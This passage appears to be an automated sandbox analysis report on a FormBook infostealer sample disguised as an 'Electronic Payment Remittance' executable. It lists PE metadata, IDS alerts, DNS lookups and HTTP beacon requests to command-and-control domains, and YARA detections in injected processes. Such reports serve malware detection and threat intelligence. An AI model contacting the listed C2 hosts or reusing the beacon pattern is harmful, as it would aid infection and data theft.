                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7da780x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x62c.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x800000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x7d9400x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x7bad80x7bc00False0.845947758838data7.48050578829IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x7e0000x62c0x800False0.34912109375data3.50217220911IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x800000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_VERSION0x7e0900x39cdata
                                                            RT_MANIFEST0x7e43c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Version Infos

                                                            DescriptionData
                                                            Translation0x0000 0x04b0
                                                            LegalCopyright1992 Donkervoort S8
                                                            Assembly Version8.0.2.0
                                                            InternalNameSerializationHeaderReco.exe
                                                            FileVersion8.0.0.0
                                                            CompanyNameCuppy's Coffee
                                                            LegalTrademarks
                                                            Comments2005 Kia Spectra
                                                            ProductNameConsole Kia
                                                            ProductVersion8.0.0.0
                                                            FileDescriptionConsole Kia
                                                            OriginalFilenameSerializationHeaderReco.exe

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            09/15/21-08:17:15.112241TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978480192.168.2.3198.54.117.211
                                                            09/15/21-08:17:15.112241TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978480192.168.2.3198.54.117.211
                                                            09/15/21-08:17:15.112241TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978480192.168.2.3198.54.117.211
                                                            09/15/21-08:17:27.003769ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                            09/15/21-08:17:36.721776ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                            09/15/21-08:17:37.722537ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 15, 2021 08:16:58.582576036 CEST4977880192.168.2.3198.54.117.215
                                                            Sep 15, 2021 08:16:58.763209105 CEST8049778198.54.117.215192.168.2.3
                                                            Sep 15, 2021 08:16:58.763370991 CEST4977880192.168.2.3198.54.117.215
                                                            Sep 15, 2021 08:16:58.763638973 CEST4977880192.168.2.3198.54.117.215
                                                            Sep 15, 2021 08:16:58.946127892 CEST8049778198.54.117.215192.168.2.3
                                                            Sep 15, 2021 08:16:58.946165085 CEST8049778198.54.117.215192.168.2.3
                                                            Sep 15, 2021 08:17:04.010411978 CEST4977980192.168.2.352.71.133.130
                                                            Sep 15, 2021 08:17:04.150010109 CEST804977952.71.133.130192.168.2.3
                                                            Sep 15, 2021 08:17:04.150124073 CEST4977980192.168.2.352.71.133.130
                                                            Sep 15, 2021 08:17:04.150310040 CEST4977980192.168.2.352.71.133.130
                                                            Sep 15, 2021 08:17:04.289341927 CEST804977952.71.133.130192.168.2.3
                                                            Sep 15, 2021 08:17:04.289372921 CEST804977952.71.133.130192.168.2.3
                                                            Sep 15, 2021 08:17:04.289396048 CEST804977952.71.133.130192.168.2.3
                                                            Sep 15, 2021 08:17:04.289764881 CEST4977980192.168.2.352.71.133.130
                                                            Sep 15, 2021 08:17:04.289892912 CEST4977980192.168.2.352.71.133.130
                                                            Sep 15, 2021 08:17:04.429339886 CEST804977952.71.133.130192.168.2.3
                                                            Sep 15, 2021 08:17:14.939905882 CEST4978480192.168.2.3198.54.117.211
                                                            Sep 15, 2021 08:17:15.111032963 CEST8049784198.54.117.211192.168.2.3
                                                            Sep 15, 2021 08:17:15.111490011 CEST4978480192.168.2.3198.54.117.211
                                                            Sep 15, 2021 08:17:15.112241030 CEST4978480192.168.2.3198.54.117.211
                                                            Sep 15, 2021 08:17:15.283358097 CEST8049784198.54.117.211192.168.2.3
                                                            Sep 15, 2021 08:17:15.283459902 CEST8049784198.54.117.211192.168.2.3
                                                            Sep 15, 2021 08:17:26.724200010 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.001388073 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.001625061 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.278853893 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.279082060 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.517899036 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.554934978 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.555051088 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.555083036 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.555226088 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.555257082 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.793827057 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.793940067 CEST4978580192.168.2.3103.15.104.66

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 15, 2021 08:15:30.576337099 CEST5128153192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:15:30.614059925 CEST53512818.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:15:54.767194033 CEST4919953192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:15:54.802340984 CEST53491998.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:16:02.618539095 CEST5062053192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:16:02.661425114 CEST53506208.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:16:02.959789038 CEST6493853192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:16:02.991704941 CEST53649388.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:16:26.359940052 CEST6015253192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:16:26.405379057 CEST53601528.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:16:39.199558973 CEST5754453192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:16:39.234639883 CEST53575448.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:16:58.536778927 CEST5598453192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:16:58.576446056 CEST53559848.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:03.958511114 CEST6418553192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:04.009198904 CEST53641858.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:09.819931030 CEST6511053192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:09.867863894 CEST53651108.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:12.239017010 CEST5836153192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:12.285737991 CEST53583618.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:13.669127941 CEST6349253192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:13.696032047 CEST53634928.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:14.904324055 CEST6083153192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:14.937865019 CEST53608318.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:25.341937065 CEST6010053192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:26.330404043 CEST6010053192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:26.722035885 CEST53601008.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:27.003680944 CEST53601008.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:32.567346096 CEST5319553192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:33.596535921 CEST5319553192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:34.596653938 CEST5319553192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:35.691082954 CEST53531958.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:36.721256018 CEST53531958.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:37.722446918 CEST53531958.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:40.708005905 CEST5014153192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:40.861347914 CEST53501418.8.8.8192.168.2.3
                                                            Sep 15, 2021 08:17:46.537237883 CEST5302353192.168.2.38.8.8.8
                                                            Sep 15, 2021 08:17:46.814873934 CEST53530238.8.8.8192.168.2.3

                                                            ICMP Packets

                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Sep 15, 2021 08:17:27.003768921 CEST192.168.2.38.8.8.8d056(Port unreachable)Destination Unreachable
                                                            Sep 15, 2021 08:17:36.721776009 CEST192.168.2.38.8.8.8cff1(Port unreachable)Destination Unreachable
                                                            Sep 15, 2021 08:17:37.722537041 CEST192.168.2.38.8.8.8cff1(Port unreachable)Destination Unreachable

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Sep 15, 2021 08:16:58.536778927 CEST192.168.2.38.8.8.80x4b46Standard query (0)www.yummyblockparty.comA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:03.958511114 CEST192.168.2.38.8.8.80xb05bStandard query (0)www.johnharrisagent.comA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:09.819931030 CEST192.168.2.38.8.8.80x6145Standard query (0)www.fitotec.netA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:14.904324055 CEST192.168.2.38.8.8.80xdd0eStandard query (0)www.itsready.supportA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:25.341937065 CEST192.168.2.38.8.8.80x3b69Standard query (0)www.btt5204.comA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:26.330404043 CEST192.168.2.38.8.8.80x3b69Standard query (0)www.btt5204.comA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:32.567346096 CEST192.168.2.38.8.8.80x2a90Standard query (0)www.hide.osakaA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:33.596535921 CEST192.168.2.38.8.8.80x2a90Standard query (0)www.hide.osakaA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:34.596653938 CEST192.168.2.38.8.8.80x2a90Standard query (0)www.hide.osakaA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:40.708005905 CEST192.168.2.38.8.8.80x4a8fStandard query (0)www.pasalsacongress.comA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:46.537237883 CEST192.168.2.38.8.8.80x6f7dStandard query (0)www.moominmamalog.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Sep 15, 2021 08:16:58.576446056 CEST8.8.8.8192.168.2.30x4b46No error (0)www.yummyblockparty.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                            Sep 15, 2021 08:16:58.576446056 CEST8.8.8.8192.168.2.30x4b46No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:16:58.576446056 CEST8.8.8.8192.168.2.30x4b46No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:16:58.576446056 CEST8.8.8.8192.168.2.30x4b46No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:16:58.576446056 CEST8.8.8.8192.168.2.30x4b46No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:16:58.576446056 CEST8.8.8.8192.168.2.30x4b46No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:16:58.576446056 CEST8.8.8.8192.168.2.30x4b46No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:16:58.576446056 CEST8.8.8.8192.168.2.30x4b46No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:04.009198904 CEST8.8.8.8192.168.2.30xb05bNo error (0)www.johnharrisagent.com52.71.133.130A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:09.867863894 CEST8.8.8.8192.168.2.30x6145Name error (3)www.fitotec.netnonenoneA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:14.937865019 CEST8.8.8.8192.168.2.30xdd0eNo error (0)www.itsready.supportparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                            Sep 15, 2021 08:17:14.937865019 CEST8.8.8.8192.168.2.30xdd0eNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:14.937865019 CEST8.8.8.8192.168.2.30xdd0eNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:14.937865019 CEST8.8.8.8192.168.2.30xdd0eNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:14.937865019 CEST8.8.8.8192.168.2.30xdd0eNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:14.937865019 CEST8.8.8.8192.168.2.30xdd0eNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:14.937865019 CEST8.8.8.8192.168.2.30xdd0eNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:14.937865019 CEST8.8.8.8192.168.2.30xdd0eNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:26.722035885 CEST8.8.8.8192.168.2.30x3b69No error (0)www.btt5204.coma3m1.cnamek.comCNAME (Canonical name)IN (0x0001)
                                                            Sep 15, 2021 08:17:26.722035885 CEST8.8.8.8192.168.2.30x3b69No error (0)a3m1.cnamek.comizgr3bagus.cdnddd.netCNAME (Canonical name)IN (0x0001)
                                                            Sep 15, 2021 08:17:26.722035885 CEST8.8.8.8192.168.2.30x3b69No error (0)izgr3bagus.cdnddd.netv3lala99.cdnddd.netCNAME (Canonical name)IN (0x0001)
                                                            Sep 15, 2021 08:17:26.722035885 CEST8.8.8.8192.168.2.30x3b69No error (0)v3lala99.cdnddd.net103.15.104.66A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:27.003680944 CEST8.8.8.8192.168.2.30x3b69No error (0)www.btt5204.coma3m1.cnamek.comCNAME (Canonical name)IN (0x0001)
                                                            Sep 15, 2021 08:17:27.003680944 CEST8.8.8.8192.168.2.30x3b69No error (0)a3m1.cnamek.comizgr3bagus.cdnddd.netCNAME (Canonical name)IN (0x0001)
                                                            Sep 15, 2021 08:17:27.003680944 CEST8.8.8.8192.168.2.30x3b69No error (0)izgr3bagus.cdnddd.netv3lala99.cdnddd.netCNAME (Canonical name)IN (0x0001)
                                                            Sep 15, 2021 08:17:27.003680944 CEST8.8.8.8192.168.2.30x3b69No error (0)v3lala99.cdnddd.net103.15.104.66A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:35.691082954 CEST8.8.8.8192.168.2.30x2a90Server failure (2)www.hide.osakanonenoneA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:36.721256018 CEST8.8.8.8192.168.2.30x2a90Server failure (2)www.hide.osakanonenoneA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:37.722446918 CEST8.8.8.8192.168.2.30x2a90Server failure (2)www.hide.osakanonenoneA (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:40.861347914 CEST8.8.8.8192.168.2.30x4a8fNo error (0)www.pasalsacongress.compasalsacongress.comCNAME (Canonical name)IN (0x0001)
                                                            Sep 15, 2021 08:17:40.861347914 CEST8.8.8.8192.168.2.30x4a8fNo error (0)pasalsacongress.com192.185.52.175A (IP address)IN (0x0001)
                                                            Sep 15, 2021 08:17:46.814873934 CEST8.8.8.8192.168.2.30x6f7dNo error (0)www.moominmamalog.com183.181.96.104A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • www.yummyblockparty.com
                                                            • www.johnharrisagent.com
                                                            • www.itsready.support
                                                            • www.btt5204.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.349778198.54.117.21580C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 15, 2021 08:16:58.763638973 CEST5871OUTGET /uytf/?4hax=Z6tv0ZGri8uWurB8AUDeWgq8Hn78EURDlDEEMIHUNMQGUG9NVGnXX5+ZYyjQXpOA0JMU&6lE=xT6Pc HTTP/1.1
                                                            Host: www.yummyblockparty.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.34977952.71.133.13080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 15, 2021 08:17:04.150310040 CEST5872OUTGET /uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pc HTTP/1.1
                                                            Host: www.johnharrisagent.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Sep 15, 2021 08:17:04.289372921 CEST5873INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty/1.17.8.2
                                                            Date: Wed, 15 Sep 2021 06:17:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 175
                                                            Connection: close
                                                            Location: https://www.johnharrisagent.com/uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pc
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.349784198.54.117.21180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 15, 2021 08:17:15.112241030 CEST5895OUTGET /uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pc HTTP/1.1
                                                            Host: www.itsready.support
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.349785103.15.104.6680C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Sep 15, 2021 08:17:27.279082060 CEST5896OUTGET /uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc HTTP/1.1
                                                            Host: www.btt5204.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Sep 15, 2021 08:17:27.555051088 CEST5897INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Wed, 15 Sep 2021 06:17:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.btt5204.com/uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Code Manipulations

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            Analysis Process: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe PID: 3176 Parent PID: 5236

                                                            General

                                                            Start time:08:15:35
                                                            Start date:15/09/2021
                                                            Path:C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
                                                            Imagebase:0x3c0000
                                                            File size:509952 bytes
                                                            MD5 hash:E29285288905EBB27D9E4443BCAA6638
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            Analysis Process: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe PID: 4180 Parent PID: 3176

                                                            General

                                                            Start time:08:15:43
                                                            Start date:15/09/2021
                                                            Path:C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                                                            Imagebase:0x8a0000
                                                            File size:509952 bytes
                                                            MD5 hash:E29285288905EBB27D9E4443BCAA6638
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            Analysis Process: explorer.exe PID: 3388 Parent PID: 4180

                                                            General

                                                            Start time:08:15:45
                                                            Start date:15/09/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff714890000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, Author: Joe Security
